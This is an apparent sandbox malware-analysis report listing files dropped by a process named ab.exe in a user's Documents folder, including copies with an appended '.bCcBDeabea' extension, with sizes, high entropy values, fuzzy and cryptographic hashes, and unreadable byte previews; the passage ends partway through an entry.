C:\Users\user\Documents\QCFWYSKMHA.xlsx.bCcBDeabea (copy) Download File
Process:	C:\Users\user\Desktop\ab.exe
File Type:	data
Category:	dropped
Size (bytes):	8728
Entropy (8bit):	7.978609401749966
Encrypted:	false
SSDEEP:	192:47CFQrbKGnx2ZSMYv1VHvT/81SRWazn0OKEHMz00nQgLd4OV+n:43rbqxGzTfDnb/HTWXdw
MD5:	5624F35BC79506D8A8957BD204ADB7B6
SHA1:	4F19BAE79CDBDB015FC01EE6EE095F5239CEEAF5
SHA-256:	7E73627B1633B11DDBC0F961755B7B52D13A4384EA87ABF8B0D3BD8952335161
SHA-512:	1CE81F2BB979F4380FC84364E5915CFD554460394BFB6A0297A1015B820CA9757338365EC006F0FD291636713091B488983088DF252E2EB8CC5B85358C543AEF
Malicious:	false
Preview:	{.....5..Kh...?@......D...noU...!.......5wM...h1..e.F}.!+.K..(....\|Q](..`~.\|,.....,'V.#.w..\...l...-.A.q..d.H.].....#-?..I.g..TQ=U...:h...^.A#o..iZ.R. .........e..Xy...Ut....r"-...k./.s\&U-....8..z....... Q.k1x..woE....U..}y.u.....zz.DpC.K..W...f.y...P.^F.\@@is..H..`.sl.t...w...^i+-..%.......-.#..2.....%...0..U.r.......3.Z%....l..<..'....0.............e0.../&.e.P.^[.q.M....<...B7.0..p.....#.B.`.?..j.'....}y'.........blUq".sE.?...-w+^..t..G\.K...MY;bw&..Z.}..B.)...6.x....5........:.\.U{X..]U.^ .)q...!\M...j.._p5..l[.YT.`..7...v].`\|8..^.W.]....;M..@&.0k[Q...v{P-q}....i....._fE.{.q.f.\|P...T.PN.1G..J..PER.g.MX....k.>..M...9..)O5.hQd.'GJ.w>>U....`e.g<x.....1.!gq.,..0>._.0q~..U......z.n`o....7...:.......R....0=D..4.,+..A'...F.i.Vv.Jm.$p^...M...3s...V..}.b.....C..f...c.}O.....yc ...{<G..`4..^3...d.z8Sq....9.%...'...#...F!.....0........._...g..]..x...zSf.=r...X.....]&.).QS..Tr...Q...zx\..2..*&^y..H..,..Q.F. qT9.g1.K.+.1..<:.0...;3_.2..%.5.

C:\Users\user\Documents\QNCYCDFIJJ.docx Download File
Process:	C:\Users\user\Desktop\ab.exe
File Type:	data
Category:	dropped
Size (bytes):	8728
Entropy (8bit):	7.979463294113997
Encrypted:	false
SSDEEP:	192:b4GMRxHtVFjGSYHhDnyVl8wFbrk7/Aa4O1687azYXqQbV+n:lstXUBDyVld0o8/Xc
MD5:	C511238F63F4E9BB0F8C1BA74058FF52
SHA1:	D0E311F82D9AE1DB8FB148268DAAB3C20A4F3753
SHA-256:	0429A55E4AF9F39872525B4271F91F4A04E4FD1D15279C51AFFD26743593CBFF
SHA-512:	8D2B37514331D96D9924B957DF81F9AB83437B96EC3E25A7CD8D23827E17C6C50933E8522B95AA02E395420008B5F6AC9E78E3EE8F81A1FA7DFA27C9A7519683
Malicious:	false
Preview:	.....1...5._5..D...U...=\|eR.R...A.....j2O.7K-=d....."#A.#..\|..}..:.F....O-.I.....Q.E.:td.....^ d,..3K...S.KV..F..C.WK.z..;ZS..%.W{r....p..>...=dw...Pk}.lv\|...'..IvBoh..C.=..W..4.b.l..u:Za..~kx.]..@..Pj..x..{O....8.Iq.j....%..n.....$.e........".._)0;}ApF.._#.....I..l{.....sY{5...M...9.P#..Y.......:2u....?YZS.r......K0B.a...R...>.T.<.^pG.P..B.k..ZJeg..U.t..P.....+N2.W_....x.}...W.I&i.9;...uLX4....M...\?.].y&M../....b.:...N.0.^....{H...@#...;"......Zs..+{..T.:....jk..9..-..?H..H..li5p.....B...{.=>.">,..C.n.8.K....h.5.........\|.....S.....E=..JHX....~67K.&..!MY...?^...Pk.X$g.r......5..'7..j ?.;..Q._...n%3.)..o.;..?.&Vug/p.P\|w....R.t....n+...Z.C..xp.Oa.H. ..T...o.t..x$.....r.N...qri~.&...#.?...[]w..clr.9r..lJ.e.(.%.V..n.`.G........P.%(...............*.\.=.1.m....V}...........#..2.?.B,i.1..1...:F.....<.......7...z.R..1..8...h.x..e..6..-..#.'=Y....M2..g..tMFs......;....+@.Az..uB.z..kT:!\8.........../.0.,.k+.h.kA.S ..7si..D....T...J.3.......g.....

C:\Users\user\Documents\QNCYCDFIJJ.docx.bCcBDeabea (copy) Download File
Process:	C:\Users\user\Desktop\ab.exe
File Type:	data
Category:	dropped
Size (bytes):	8728
Entropy (8bit):	7.979463294113997
Encrypted:	false
SSDEEP:	192:b4GMRxHtVFjGSYHhDnyVl8wFbrk7/Aa4O1687azYXqQbV+n:lstXUBDyVld0o8/Xc
MD5:	C511238F63F4E9BB0F8C1BA74058FF52
SHA1:	D0E311F82D9AE1DB8FB148268DAAB3C20A4F3753
SHA-256:	0429A55E4AF9F39872525B4271F91F4A04E4FD1D15279C51AFFD26743593CBFF
SHA-512:	8D2B37514331D96D9924B957DF81F9AB83437B96EC3E25A7CD8D23827E17C6C50933E8522B95AA02E395420008B5F6AC9E78E3EE8F81A1FA7DFA27C9A7519683
Malicious:	false
Preview:	.....1...5._5..D...U...=\|eR.R...A.....j2O.7K-=d....."#A.#..\|..}..:.F....O-.I.....Q.E.:td.....^ d,..3K...S.KV..F..C.WK.z..;ZS..%.W{r....p..>...=dw...Pk}.lv\|...'..IvBoh..C.=..W..4.b.l..u:Za..~kx.]..@..Pj..x..{O....8.Iq.j....%..n.....$.e........".._)0;}ApF.._#.....I..l{.....sY{5...M...9.P#..Y.......:2u....?YZS.r......K0B.a...R...>.T.<.^pG.P..B.k..ZJeg..U.t..P.....+N2.W_....x.}...W.I&i.9;...uLX4....M...\?.].y&M../....b.:...N.0.^....{H...@#...;"......Zs..+{..T.:....jk..9..-..?H..H..li5p.....B...{.=>.">,..C.n.8.K....h.5.........\|.....S.....E=..JHX....~67K.&..!MY...?^...Pk.X$g.r......5..'7..j ?.;..Q._...n%3.)..o.;..?.&Vug/p.P\|w....R.t....n+...Z.C..xp.Oa.H. ..T...o.t..x$.....r.N...qri~.&...#.?...[]w..clr.9r..lJ.e.(.%.V..n.`.G........P.%(...............*.\.=.1.m....V}...........#..2.?.B,i.1..1...:F.....<.......7...z.R..1..8...h.x..e..6..-..#.'=Y....M2..g..tMFs......;....+@.Az..uB.z..kT:!\8.........../.0.,.k+.h.kA.S ..7si..D....T...J.3.......g.....

C:\Users\user\Documents\QNCYCDFIJJ.jpg Download File
Process:	C:\Users\user\Desktop\ab.exe
File Type:	data
Category:	dropped
Size (bytes):	8728
Entropy (8bit):	7.980350636427151
Encrypted:	false
SSDEEP:	192:CshZ5RiqVHqB4Xbo3Cy9bgqmbCgKZLkMSEVaOgV+n:CshZrJ0BCbobbgrGkyos
MD5:	E888844640E13228E8E4DB5737FF4392
SHA1:	A8E18884FFCA160732F905ABE2761DE217C4F1FB
SHA-256:	B80D2053F73A526210889E445752516A7F91943AE996B659C00AF4D6F652319A
SHA-512:	702F7E2BE5247482EF71321DD0CE882664ABBFAE15FF9843B55C977610EC76A9EFAB30DA595A035A392587993D10F2990189B1DE16BBFD7D6EF4178AD0BEE1F8
Malicious:	false
Preview:	..o..^.......m..m..v..........u...R8....SZ....L`.n.PbB9<&..\..."?U=......S.E...v.n.VF.$.H..[..?Qx...Fi..`NS.k.T.U.^.j.'@.F.2j...x%....9%.F....qY.u.g.?d?.{....b+....[v^(.C.',..n.{.V#6...a.pb.&.G.....'..I.......;.........f.UV.]}...7\|.NX...22...,..D.?}..D9............}..s/.y^A.1.>.......]PkX?.o...i.x,....mO...po...m.0.E.vX..(A........4z>2.R......6wR....J))....0z....ema.Bo...p.N.........\|.O..... ....`'..T.0.6o....t.m`.....2.S.&V>.m}...a..~...d...{..f...z9.>;zW...N.....{....tXR......."...,(&.f..s.@<.+...N`o.l.../.%b.K.Dm.7a.Y.h...F.G.......V.b..Pp.....b....~#O<.c.....;w.Upl.,...sw<F ..l.=..v.M......3....n......j5.q..@....0W:.VX.PAy...t.(....r.#.......)...'..8.4.@.3F.w,%.=..F..$.k.B.L..N...)...h....\...rA\.:......A..!..$...N.Z._.Hr./B..N....\.}.S.v......"~.27..........0.j.....f....N".Z.".I..8...[.~w7...28...6=..zZ..*...".Q.)....'.!.XVY.hot..9...n4./#.cK...". ]p_.U.....-aR..E....nI./......4........gNr..DW...F......M.m.k...F.1~..y.g..>>....

C:\Users\user\Documents\QNCYCDFIJJ.jpg.bCcBDeabea (copy) Download File
Process:	C:\Users\user\Desktop\ab.exe
File Type:	data
Category:	dropped
Size (bytes):	8728
Entropy (8bit):	7.980350636427151
Encrypted:	false
SSDEEP:	192:CshZ5RiqVHqB4Xbo3Cy9bgqmbCgKZLkMSEVaOgV+n:CshZrJ0BCbobbgrGkyos
MD5:	E888844640E13228E8E4DB5737FF4392
SHA1:	A8E18884FFCA160732F905ABE2761DE217C4F1FB
SHA-256:	B80D2053F73A526210889E445752516A7F91943AE996B659C00AF4D6F652319A
SHA-512:	702F7E2BE5247482EF71321DD0CE882664ABBFAE15FF9843B55C977610EC76A9EFAB30DA595A035A392587993D10F2990189B1DE16BBFD7D6EF4178AD0BEE1F8
Malicious:	false
Preview:	..o..^.......m..m..v..........u...R8....SZ....L`.n.PbB9<&..\..."?U=......S.E...v.n.VF.$.H..[..?Qx...Fi..`NS.k.T.U.^.j.'@.F.2j...x%....9%.F....qY.u.g.?d?.{....b+....[v^(.C.',..n.{.V#6...a.pb.&.G.....'..I.......;.........f.UV.]}...7\|.NX...22...,..D.?}..D9............}..s/.y^A.1.>.......]PkX?.o...i.x,....mO...po...m.0.E.vX..(A........4z>2.R......6wR....J))....0z....ema.Bo...p.N.........\|.O..... ....`'..T.0.6o....t.m`.....2.S.&V>.m}...a..~...d...{..f...z9.>;zW...N.....{....tXR......."...,(&.f..s.@<.+...N`o.l.../.%b.K.Dm.7a.Y.h...F.G.......V.b..Pp.....b....~#O<.c.....;w.Upl.,...sw<F ..l.=..v.M......3....n......j5.q..@....0W:.VX.PAy...t.(....r.#.......)...'..8.4.@.3F.w,%.=..F..$.k.B.L..N...)...h....\...rA\.:......A..!..$...N.Z._.Hr./B..N....\.}.S.v......"~.27..........0.j.....f....N".Z.".I..8...[.~w7...28...6=..zZ..*...".Q.)....'.!.XVY.hot..9...n4./#.cK...". ]p_.U.....-aR..E....nI./......4........gNr..DW...F......M.m.k...F.1~..y.g..>>....

C:\Users\user\Documents\QNCYCDFIJJ\EFOYFBOLXA.jpg Download File
Process:	C:\Users\user\Desktop\ab.exe
File Type:	data
Category:	dropped
Size (bytes):	8728
Entropy (8bit):	7.977205884376791
Encrypted:	false
SSDEEP:	192:h+4iZTnNsDoshPHkczpCkqj31d5AhlFWkFtYm0fjswxGNikcFKoESj2JV+n:qZ7ODdhvhzpFqjFrcrFWfjswxAikcFKG
MD5:	C762250734B9B9DC82F559E378A1D773
SHA1:	BCC3B4F8608C200C4EB4A7B7AA0FB0413262F53D
SHA-256:	B25655F5FE5AD2A4F332A1B9863DE60759F429FEFA7FAC98FC88042F59C05986
SHA-512:	AD4EF2E819ADACC4755F5BE80CBECC13D0D658CD0754C90243197920447C4154E882F11BB407F523FDC8A85E6707CE1C4FC154EBD6A385F1CC16BDA6FCE1758B
Malicious:	false
Preview:	...$......ow.&....Z...?zk1H.4...Z..~.3a.......C.v.$....8.....j&?\v.Y'..>.h..._.e.y....g.D..-.........I....t..T..o..=..X.t[y.%....G06................gO..5p...k....-s.>..]Y...x...R..h.......:..33..bG........ -`.2..,..........(.l..dt.N.m.[&....7p=...X..R..8.c.s.P3.wU.C)..!0....\D...........8..V#.O[V.elR.r9z..).)ZDt..; .Xj~\..u...%.+.d...I..eS.2..../O..y@.{.h[.<W..B...G.......;K....S.&...SJ?..s...k....q..!..Mh...T.5.e.$).8C9.V.e..i.v..w......Ox\|...=..{......8..............<.3Q...?.;...U..m.;.O.e......q.T.rI.U....W.q%.o.Q.GH.L...".=.\|...J \|.R[.......\T...`g....76;..^/B_Oa....6....A../...}c..D..2}.?. O...KU..;.~.......CTYw.."..$..8vy gw@...q.ML..L7CS.....7.cw...>.;.....D+..%Z\|.h..E..Trb.b.?,..c..1 h...;....^lu....X.=.Ch..[b.F..c.......f..V..E....Nt..O..?.3../...EB ..{.p@)...q!J......J<.f\..b..QX!...b$).....z...>.d..2..-.'....-3..p..DQ.x.[.q.cXq...p9.\|....n...eM$.u.FrX\...7..e.....g.+k.~Y&S3.....C.. W`.........e....h.eK&..1,..\.G.7..

C:\Users\user\Documents\QNCYCDFIJJ\EFOYFBOLXA.jpg.bCcBDeabea (copy) Download File
Process:	C:\Users\user\Desktop\ab.exe
File Type:	data
Category:	dropped
Size (bytes):	8728
Entropy (8bit):	7.977205884376791
Encrypted:	false
SSDEEP:	192:h+4iZTnNsDoshPHkczpCkqj31d5AhlFWkFtYm0fjswxGNikcFKoESj2JV+n:qZ7ODdhvhzpFqjFrcrFWfjswxAikcFKG
MD5:	C762250734B9B9DC82F559E378A1D773
SHA1:	BCC3B4F8608C200C4EB4A7B7AA0FB0413262F53D
SHA-256:	B25655F5FE5AD2A4F332A1B9863DE60759F429FEFA7FAC98FC88042F59C05986
SHA-512:	AD4EF2E819ADACC4755F5BE80CBECC13D0D658CD0754C90243197920447C4154E882F11BB407F523FDC8A85E6707CE1C4FC154EBD6A385F1CC16BDA6FCE1758B
Malicious:	false
Preview:	...$......ow.&....Z...?zk1H.4...Z..~.3a.......C.v.$....8.....j&?\v.Y'..>.h..._.e.y....g.D..-.........I....t..T..o..=..X.t[y.%....G06................gO..5p...k....-s.>..]Y...x...R..h.......:..33..bG........ -`.2..,..........(.l..dt.N.m.[&....7p=...X..R..8.c.s.P3.wU.C)..!0....\D...........8..V#.O[V.elR.r9z..).)ZDt..; .Xj~\..u...%.+.d...I..eS.2..../O..y@.{.h[.<W..B...G.......;K....S.&...SJ?..s...k....q..!..Mh...T.5.e.$).8C9.V.e..i.v..w......Ox\|...=..{......8..............<.3Q...?.;...U..m.;.O.e......q.T.rI.U....W.q%.o.Q.GH.L...".=.\|...J \|.R[.......\T...`g....76;..^/B_Oa....6....A../...}c..D..2}.?. O...KU..;.~.......CTYw.."..$..8vy gw@...q.ML..L7CS.....7.cw...>.;.....D+..%Z\|.h..E..Trb.b.?,..c..1 h...;....^lu....X.=.Ch..[b.F..c.......f..V..E....Nt..O..?.3../...EB ..{.p@)...q!J......J<.f\..b..QX!...b$).....z...>.d..2..-.'....-3..p..DQ.x.[.q.cXq...p9.\|....n...eM$.u.FrX\...7..e.....g.+k.~Y&S3.....C.. W`.........e....h.eK&..1,..\.G.7..

C:\Users\user\Documents\QNCYCDFIJJ\PALRGUCVEH.png Download File
Process:	C:\Users\user\Desktop\ab.exe
File Type:	data
Category:	dropped
Size (bytes):	8728
Entropy (8bit):	7.975836604523676
Encrypted:	false
SSDEEP:	192:nkt38m7VSmGApGESO+imeL+6qMf5zvYaPc4i+x16n0BK4PVIq2nIpTfV+n:n4LfpGEQ3f63fJgK19X40Ec2ItI
MD5:	00B1CCD919E5E7D538CBB904EE5F9972
SHA1:	68E2E7A275AF86FC1FC049001009B6E1047D23B9
SHA-256:	4C76403EA5A86ACA8441EDEA8286D472D1911A0EE350B645DB2265FECD639DD5
SHA-512:	C5646F45D27B3EBD18CEAB60FCDE69696ED8B6FB7E0A4F9F34A6D9751524AA71CCE0225A585BCEF50BCD66180CD23E4BEDEB81A795CE2EAA2CAC039AE57F7E1B
Malicious:	false
Preview:	..`3........&...;.....s^.!}........1.i_.....d.. ..o..B..t.KS.......y..=Ve......Km$.H.G...ltUc.l...)!.Q.m+Q..`.....`...9.....Z.t.+{...~y..;..WSx..7....C}..m.......O.%?.....%..n........'}.i...RvQ.\|l.#m.....@5Y.....j..R.xC......:I...&.,.U@W..+.`FH...a.. .... FSgTNjVi.M. ..../R.2.!@...q.^5<....r..=..SU20.x..W.F..$.U..'.....^s......_.d.%.3..X.Gb.K.. .EX......1...:F}O..P..=......WW....>.5.."..P.C..$~.V.........%ihz..=....v....skG...c.4b..].U...Y.w.G&..m..>z.......?...0-'...j.>.n.R#.,... .......L)......O..d......W6.&.j...vP...pw7O&..!...Z.Si...@"..&@..A..z.o......8....n....GvA.....'..n.u}..HI[....H....q.@;.tk..Dk..0.g~a....QU..V.\..@.de...rZ.x.~8~..d.`..O......7.9._.Qf&x...Np[^..R.Gek../....U..........u!R.(..VDR...A..h.)#..Y0.!E...........!..HX..y...^}b.L..u+..0.O.?J.q..[...B..p..n.z.i.N..4.P.............v...._.f.<..r1.g...y.....)w].UmP?.:.....)7...F...Q!..\^?.R..:........H...O.\|`.6...y.T.Ms....$..).........M8...FV\|..g....zQ.@.C..v._Tb.

C:\Users\user\Documents\QNCYCDFIJJ\PALRGUCVEH.png.bCcBDeabea (copy) Download File
Process:	C:\Users\user\Desktop\ab.exe
File Type:	data
Category:	dropped
Size (bytes):	8728
Entropy (8bit):	7.975836604523676
Encrypted:	false
SSDEEP:	192:nkt38m7VSmGApGESO+imeL+6qMf5zvYaPc4i+x16n0BK4PVIq2nIpTfV+n:n4LfpGEQ3f63fJgK19X40Ec2ItI
MD5:	00B1CCD919E5E7D538CBB904EE5F9972
SHA1:	68E2E7A275AF86FC1FC049001009B6E1047D23B9
SHA-256:	4C76403EA5A86ACA8441EDEA8286D472D1911A0EE350B645DB2265FECD639DD5
SHA-512:	C5646F45D27B3EBD18CEAB60FCDE69696ED8B6FB7E0A4F9F34A6D9751524AA71CCE0225A585BCEF50BCD66180CD23E4BEDEB81A795CE2EAA2CAC039AE57F7E1B
Malicious:	false
Preview:	..`3........&...;.....s^.!}........1.i_.....d.. ..o..B..t.KS.......y..=Ve......Km$.H.G...ltUc.l...)!.Q.m+Q..`.....`...9.....Z.t.+{...~y..;..WSx..7....C}..m.......O.%?.....%..n........'}.i...RvQ.\|l.#m.....@5Y.....j..R.xC......:I...&.,.U@W..+.`FH...a.. .... FSgTNjVi.M. ..../R.2.!@...q.^5<....r..=..SU20.x..W.F..$.U..'.....^s......_.d.%.3..X.Gb.K.. .EX......1...:F}O..P..=......WW....>.5.."..P.C..$~.V.........%ihz..=....v....skG...c.4b..].U...Y.w.G&..m..>z.......?...0-'...j.>.n.R#.,... .......L)......O..d......W6.&.j...vP...pw7O&..!...Z.Si...@"..&@..A..z.o......8....n....GvA.....'..n.u}..HI[....H....q.@;.tk..Dk..0.g~a....QU..V.\..@.de...rZ.x.~8~..d.`..O......7.9._.Qf&x...Np[^..R.Gek../....U..........u!R.(..VDR...A..h.)#..Y0.!E...........!..HX..y...^}b.L..u+..0.O.?J.q..[...B..p..n.z.i.N..4.P.............v...._.f.<..r1.g...y.....)w].UmP?.:.....)7...F...Q!..\^?.R..:........H...O.\|`.6...y.T.Ms....$..).........M8...FV\|..g....zQ.@.C..v._Tb.

C:\Users\user\Documents\QNCYCDFIJJ\QNCYCDFIJJ.docx Download File
Process:	C:\Users\user\Desktop\ab.exe
File Type:	data
Category:	dropped
Size (bytes):	8728
Entropy (8bit):	7.979500254747108
Encrypted:	false
SSDEEP:	96:Q9bXQRBEwOE5Ym9nN+QAAyjUgZqSGVgUZXKl6gapThme6CURSU74eRfvqzdLSKm1:O+G27UZqSCfmO8e6CUkU9EdLSK15vV+n
MD5:	B15E29F1FDBB2ABCFF12804D4E4D00AE
SHA1:	AE6E4B70766FC95F65627C070E95E888D5CF1FEE
SHA-256:	5EDC3B4C729990C19367D07ADCD2A139DCFB4B92EFD8978FD9544A1761160FBD
SHA-512:	F3D69EA24FA3D751B320CFFC5C64F658A19C226B92B09BDF863FEE829268473F71A7D27301FC41D94C74E920E67ED0E4C881277308623F24D59A41D1C8153D66
Malicious:	false
Preview:	z.xo\S.(....n..5pc.E.uj:Ir#..j.B.....+..}.+,e.H~....hn..Y.MQ.{>vf.o..v.......=...K.....I.[.D..b......>.zn>. 7..............l..........1qmg.G......4.h.....4T\|T..w..../...r'o...'...-...G......;`..BG....#F..#..O!.W.$.fc.@5...5)..1S...._e!..eMD...p.%q...a\..P09?.k........X..fr.>....z.`....3... r../.$.Z:.\|Hp..S......N..1.{Kf..7.S..V...E......X.'.kF^.........c....&....[}(0D.VG...0[....=6.E.....`.H.cY)'.c[ZA...D.A.\|.y........oM.>m.hgq.b9.......:.+).M.0L.....;...L..)!jyJ.#....)_..s)A....E.{:\.T...).<y.......N.wQ..(/.....4../i{Xf.l.y..n.....M.X\|..B.....\.....KU...0.a....s.i.....P.eJ..d*..H.s.,x..x.X.....`...y]?YK.E.~........\....]...U...tV.N.7....2..w... .( .U#.cg.LM. ,..j..9.X..j.fe..Ke....Y..X.~rld.....q`...z......O.zXy..n2D.7/(..O8X.....W....6..K......_..Z.,.&....a.e...4.........AX..v.yB.....[W,.......<.1...'.(<uM..:Z....>.v`B.x..P.l.2L.......5..v........lu.x+$.........e.$.Av..EHV.....\|..o.u\.Q....J..v^&.9....k..4.4...6....rw.....S.A0.

C:\Users\user\Documents\QNCYCDFIJJ\QNCYCDFIJJ.docx.bCcBDeabea (copy) Download File
Process:	C:\Users\user\Desktop\ab.exe
File Type:	data
Category:	dropped
Size (bytes):	8728
Entropy (8bit):	7.979500254747108
Encrypted:	false
SSDEEP:	96:Q9bXQRBEwOE5Ym9nN+QAAyjUgZqSGVgUZXKl6gapThme6CURSU74eRfvqzdLSKm1:O+G27UZqSCfmO8e6CUkU9EdLSK15vV+n
MD5:	B15E29F1FDBB2ABCFF12804D4E4D00AE
SHA1:	AE6E4B70766FC95F65627C070E95E888D5CF1FEE
SHA-256:	5EDC3B4C729990C19367D07ADCD2A139DCFB4B92EFD8978FD9544A1761160FBD
SHA-512:	F3D69EA24FA3D751B320CFFC5C64F658A19C226B92B09BDF863FEE829268473F71A7D27301FC41D94C74E920E67ED0E4C881277308623F24D59A41D1C8153D66
Malicious:	false
Preview:	z.xo\S.(....n..5pc.E.uj:Ir#..j.B.....+..}.+,e.H~....hn..Y.MQ.{>vf.o..v.......=...K.....I.[.D..b......>.zn>. 7..............l..........1qmg.G......4.h.....4T\|T..w..../...r'o...'...-...G......;`..BG....#F..#..O!.W.$.fc.@5...5)..1S...._e!..eMD...p.%q...a\..P09?.k........X..fr.>....z.`....3... r../.$.Z:.\|Hp..S......N..1.{Kf..7.S..V...E......X.'.kF^.........c....&....[}(0D.VG...0[....=6.E.....`.H.cY)'.c[ZA...D.A.\|.y........oM.>m.hgq.b9.......:.+).M.0L.....;...L..)!jyJ.#....)_..s)A....E.{:\.T...).<y.......N.wQ..(/.....4../i{Xf.l.y..n.....M.X\|..B.....\.....KU...0.a....s.i.....P.eJ..d*..H.s.,x..x.X.....`...y]?YK.E.~........\....]...U...tV.N.7....2..w... .( .U#.cg.LM. ,..j..9.X..j.fe..Ke....Y..X.~rld.....q`...z......O.zXy..n2D.7/(..O8X.....W....6..K......_..Z.,.&....a.e...4.........AX..v.yB.....[W,.......<.1...'.(<uM..:Z....>.v`B.x..P.l.2L.......5..v........lu.x+$.........e.$.Av..EHV.....\|..o.u\.Q....J..v^&.9....k..4.4...6....rw.....S.A0.

C:\Users\user\Documents\QNCYCDFIJJ\SQSJKEBWDT.pdf Download File
Process:	C:\Users\user\Desktop\ab.exe
File Type:	data
Category:	dropped
Size (bytes):	8728
Entropy (8bit):	7.9770356142388525
Encrypted:	false
SSDEEP:	192:hfpGw0KRrDy4F0keQuSqvwfQOkr1m0uKwyu7zSR3LKoE6+yqaPlV+n:ZpGQF0keQu/vV1mFKw9qR3L7PFi
MD5:	4F75E5FEEE8DC5C49FC06E6244575C79
SHA1:	524C8721F5841DEDF7C80065F00A21A7BF79682F
SHA-256:	8929A2D6310DC164C045E2671C358F50D4E051E136CFF6016753027044796F9E
SHA-512:	2E15DF498052543224B52F37890B0978003BB7A541E8B75FF78906A3E112F0F5C2094B099A0FA9D56F20FAFCA24447F3111461456F82C6556EE24070B3D3D1AD
Malicious:	false
Preview:	..>....\......3o..7.}.nB.\Iz...=.).N........Z.....d.z<.s.A8..a.4...\|....2..7.N....W.....VoK$....o.......O...=w.}...,..C..i..f..BV..TPv...5_.4y../...6R....H.D...aj...v1..r..\|_a..H........Vj>.@.=.r.$.o;J....].o.\Th.u.B.l......,=..f"..o..c.S.Zd...2..T.=^.b.Kmz`.5<.......O@.?..'V'..f...6Y.\|.=...Y....O..@n.=M........nb/.L....1.....hk...w...~.......R.\.8..W..yIm...eV.ef..d..i.++.dE9xI6L..qt.5{`d.C}..c....Y.0..1o.C.....CD..[.U%....&;...C..6a.tDL [E..\fn..\|.P..>=..`...R...k.V....Tx.^ta.. ......hbD..t-..I.Y+.Y.W.D.^k....-$C."...8.3.O...[.<.axSW.M$w.P:~....\|..d.I..}..........nv...%...w....Z`.(.'..)..r.....1.\%4....y.h[...R.5..A.;.y....?w^..q...).Ll_....LZ...._Re3z../..J.(.)....)....n....$2...'.Z.Y6r.pY.30...o@....=y.g.=%[y.IQ.5...],.]...B.6T...raV...7....<.45.!..E.C.@.....-. .........S..\|.x..7.'..SE(...k..-...M_.j.M.;C....'s.b..zXI..j.k.$`.......:...w..F$v.$.".[.s.M.[..JB..,.>3.F.\|#.n.....}?...k..Sz..S."...6......t.i...Z.....R.u.;..h;....4q@.Z.j%.

C:\Users\user\Documents\QNCYCDFIJJ\SQSJKEBWDT.pdf.bCcBDeabea (copy) Download File
Process:	C:\Users\user\Desktop\ab.exe
File Type:	data
Category:	dropped
Size (bytes):	8728
Entropy (8bit):	7.9770356142388525
Encrypted:	false
SSDEEP:	192:hfpGw0KRrDy4F0keQuSqvwfQOkr1m0uKwyu7zSR3LKoE6+yqaPlV+n:ZpGQF0keQu/vV1mFKw9qR3L7PFi
MD5:	4F75E5FEEE8DC5C49FC06E6244575C79
SHA1:	524C8721F5841DEDF7C80065F00A21A7BF79682F
SHA-256:	8929A2D6310DC164C045E2671C358F50D4E051E136CFF6016753027044796F9E
SHA-512:	2E15DF498052543224B52F37890B0978003BB7A541E8B75FF78906A3E112F0F5C2094B099A0FA9D56F20FAFCA24447F3111461456F82C6556EE24070B3D3D1AD
Malicious:	false
Preview:	..>....\......3o..7.}.nB.\Iz...=.).N........Z.....d.z<.s.A8..a.4...\|....2..7.N....W.....VoK$....o.......O...=w.}...,..C..i..f..BV..TPv...5_.4y../...6R....H.D...aj...v1..r..\|_a..H........Vj>.@.=.r.$.o;J....].o.\Th.u.B.l......,=..f"..o..c.S.Zd...2..T.=^.b.Kmz`.5<.......O@.?..'V'..f...6Y.\|.=...Y....O..@n.=M........nb/.L....1.....hk...w...~.......R.\.8..W..yIm...eV.ef..d..i.++.dE9xI6L..qt.5{`d.C}..c....Y.0..1o.C.....CD..[.U%....&;...C..6a.tDL [E..\fn..\|.P..>=..`...R...k.V....Tx.^ta.. ......hbD..t-..I.Y+.Y.W.D.^k....-$C."...8.3.O...[.<.axSW.M$w.P:~....\|..d.I..}..........nv...%...w....Z`.(.'..)..r.....1.\%4....y.h[...R.5..A.;.y....?w^..q...).Ll_....LZ...._Re3z../..J.(.)....)....n....$2...'.Z.Y6r.pY.30...o@....=y.g.=%[y.IQ.5...],.]...B.6T...raV...7....<.45.!..E.C.@.....-. .........S..\|.x..7.'..SE(...k..-...M_.j.M.;C....'s.b..zXI..j.k.$`.......:...w..F$v.$.".[.s.M.[..JB..,.>3.F.\|#.n.....}?...k..Sz..S."...6......t.i...Z.....R.u.;..h;....4q@.Z.j%.

C:\Users\user\Documents\QNCYCDFIJJ\SUAVTZKNFL.xlsx Download File
Process:	C:\Users\user\Desktop\ab.exe
File Type:	data
Category:	dropped
Size (bytes):	8728
Entropy (8bit):	7.980628590509694
Encrypted:	false
SSDEEP:	192:MAnhbq10pPlCWsjMTuvm4nqEcdZETDJi+wYjQYy8uKO53uUXEORV+n:M2hbqSpNHPTuZqNdZETDhyok3xW
MD5:	6A61C54C3E0F4E8640132FD9D3A09A96
SHA1:	2137D59558C0F728705CFCF38EEB2F85639AF046
SHA-256:	86BE7102BC664185C0C4467443BF41731F9F58AF8BDA2DD4F35E1AB8658530E3
SHA-512:	B96829B08114408DD4EEBE092EAE88DD386E8CD32F3D100F8678EBC0F8A244018ADA0056334A95BA8E49ADA701A8955CAD4E52C7B3F174BB5E00D99E11B2793E
Malicious:	false
Preview:	S.^.h...o...(..sK.ux...;:.].&}.Iw(...c{^.D..S...TF.:..........+.G.\4Un...d.....b.j...k...Zt....D.....h..v.T.P)S..V........Z6...P._ ..Ae}.2V...h.A.I.j....."Q.....>hx......-H..$... ..X...+..sim..T.m?....m<.....J.w.]......t\.....~-.xX.O;..}.6....;R.qr.....=........M....r^......Q..)...w].w..........1../{.y...C........6..[ .gy..s;.z...`...y}[.!..\..3$..S..p.......2.R..FK...;... ...3..O./#...:q...0..%.Z.d....F.DVO.h2r.....'[...QP.j...0 K..[u.4...s.d}.....")Z..h....F....RlFI.........*z.e...T..!.....4.7N...`V..C..._OM@.e....[...].R.......o.gKM.N.b...............e..:A..G.o...3....v..?.`...M..S..".Z.Y.w.......:.C.o.w$........G....8....y...-.5.T5k.UWt..N.i(...a......T..V..;.hW!?.........ao#;}..U..p[@V\tF-.......T=..Re~?....JC.%\|...NG..rS...B.B.~...q...~Hzc..j.......`D.......d..C......>....,X..A......`..K...Y.Z9....(..v?..~I\/l....8.....o.?."/....3..9..P.5.....@...e..K.7.._k6..H.Us.v....AU......{.....#K....\|....R.w.......,..'.....m..c..

C:\Users\user\Documents\QNCYCDFIJJ\SUAVTZKNFL.xlsx.bCcBDeabea (copy) Download File
Process:	C:\Users\user\Desktop\ab.exe
File Type:	data
Category:	dropped
Size (bytes):	8728
Entropy (8bit):	7.980628590509694
Encrypted:	false
